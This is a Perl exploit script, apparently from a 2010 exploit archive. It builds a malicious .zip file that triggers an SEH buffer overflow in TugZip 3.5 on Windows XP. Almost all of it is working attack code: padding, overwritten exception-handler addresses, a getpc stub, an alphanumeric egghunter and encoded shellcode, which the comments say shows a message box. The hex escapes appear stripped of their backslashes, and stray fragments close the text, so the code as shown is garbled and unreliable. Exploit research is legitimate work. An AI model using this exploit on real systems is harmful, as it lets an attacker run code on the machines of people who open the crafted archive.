TugZip 3.5 Zip File Buffer Overflow :

Date : 2010-04-01 Author : Lincoln
#!/usr/bin/perl
# Software      : TugZip 3.5 (.zip)
# Author        : Lincoln
# Assisted by   : corelanc0d3r
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|
";
print "|                         __               __                      |
";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
";
print "|                                                                  |
";
print "|                                       http://www.corelan.be:8800 |
";
print "|                                                                  |
";
print "|-------------------------------------------------[ EIP Hunters ]--|

";
print "[+] Exploit for TugZip 3.5 
";



my $filename="tugzip.zip";
my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xb8x0b" .# 3k size
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xb8x0b". # 3k size
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"xe6x0bx00x00". # +46
"xe5x0bx00x00". # +30
"x00x00";

#Only about 120 bytes after p/p/r

my $getpc =
#align regs into ebx
"x61x61x61x61x61x5b".

#getpc: http://www.corelan.be:8800/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/
"x89x05".   #jmp short (5 bytes) to 'jmp back' at end
"x5e".       #pop esi
"x41".       #nop (inc ecx)
"x98x99".   #call esi
"x41".       #nop (inc ecx)
"x8ax94x98x98x98";  #jmp back to pop esi

#mov ebx into egghunter starting location, base reg esi
my $egg =
"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIK9Jzs".
"rbrRJuRRxzmvNWLWuQJt4ZOnXPwtpTpQdLKJZLoPuzJNO3EXgkOJGA";

#msgbox: "Exploited by Corelan Security Team"
my $shellcode =
"w00tw00t".
"x89xe3xdaxd7xd9x73xf4x59x49x49x49x49x49x49" .
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5a" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x4ax79x4ax4bx4dx4bx4bx69x51x64x45" .
"x74x4ax54x45x61x4ex32x4ex52x42x5ax46x51x49" .
"x59x42x44x4ex6bx51x61x44x70x4cx4bx43x46x44" .
"x4cx4ex6bx42x56x47x6cx4cx4bx51x56x44x48x4c" .
"x4bx51x6ex45x70x4ex6bx45x66x50x38x50x4fx47" .
"x68x50x75x4cx33x50x59x45x51x4bx61x4bx4fx48" .
"x61x51x70x4cx4bx50x6cx46x44x45x74x4cx4bx51" .
"x55x47x4cx4cx4bx50x54x43x35x50x78x43x31x4b" .
"x5ax4cx4bx42x6ax47x68x4ex6bx43x6ax47x50x45" .
"x51x4ax4bx48x63x46x57x50x49x4ex6bx44x74x4c" .
"x4bx45x51x4ax4ex44x71x49x6fx50x31x4bx70x4b" .
"x4cx4ex4cx4fx74x4bx70x43x44x46x6ax4ax61x4a" .
"x6fx44x4dx47x71x4bx77x48x69x4ax51x4bx4fx49" .
"x6fx49x6fx45x6bx43x4cx45x74x51x38x51x65x49" .
"x4ex4ex6bx42x7ax45x74x45x51x4ax4bx43x56x4e" .
"x6bx46x6cx42x6bx4cx4bx43x6ax45x4cx43x31x4a" .
"x4bx4ex6bx45x54x4ex6bx47x71x4dx38x4fx79x51" .
"x54x46x44x47x6cx45x31x4ax63x4fx42x44x48x46" .
"x49x48x54x4fx79x4bx55x4dx59x49x52x50x68x4c" .
"x4ex50x4ex44x4ex48x6cx50x52x4bx58x4dx4cx4b" .
"x4fx49x6fx4bx4fx4fx79x51x55x46x64x4dx6bx51" .
"x6ex49x48x4dx32x51x63x4cx47x45x4cx44x64x51" .
"x42x4dx38x4ex6bx49x6fx49x6fx4bx4fx4cx49x42" .
"x65x47x78x43x58x42x4cx50x6cx45x70x4bx4fx51" .
"x78x47x43x45x62x46x4ex45x34x45x38x51x65x51" .
"x63x45x35x44x32x4dx58x51x4cx44x64x44x4ax4c" .
"x49x48x66x43x66x4bx4fx43x65x46x64x4cx49x4b" .
"x72x50x50x4dx6bx4ex48x4cx62x50x4dx4dx6cx4e" .
"x67x47x6cx47x54x46x32x4bx58x43x6ex49x6fx49" .
"x6fx49x6fx42x48x51x74x45x71x51x48x45x70x43" .
"x58x44x30x43x47x42x4ex42x45x44x71x4bx6bx4b" .
"x38x43x6cx45x74x46x66x4bx39x48x63x45x38x50" .
"x61x42x4dx50x58x45x70x51x78x42x59x45x70x50" .
"x54x51x75x51x78x44x35x43x42x50x69x51x64x43" .
"x58x51x30x43x63x45x35x43x53x51x78x42x45x42" .
"x4cx50x61x50x6ex42x48x51x30x51x53x50x6fx50" .
"x72x45x38x43x54x51x30x50x62x43x49x51x78x42" .
"x4fx43x59x42x54x50x65x51x78x42x65x51x68x42" .
"x50x50x6cx46x51x48x49x4ex68x50x4cx46x44x45" .
"x72x4dx59x49x71x44x71x4ax72x43x62x43x63x50" .
"x51x46x32x4bx4fx48x50x50x31x4fx30x46x30x4b" .
"x4fx51x45x44x48x45x5ax41x41";

# --- payload ---
my $size=2996;
my $junk = "A" x 372;
my $nseh="x61x5cx7ax04"; #Small space, take advantage!
my $seh ="x7ex30x0cx7e";  #ztvcabin.7E0C307E
my $payload = $junk.$nseh.$seh.$getpc.$egg.$shellcode;
my $rest = "D" x ($size - length($payload)); #more room
$payload = $payload . $rest. ".txt";

print "[+] Size : " . length($payload)."
";
system("del $filename");
print "[+] Creating new vulnerable file: $filename

";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);

C1

 

C2

 

C3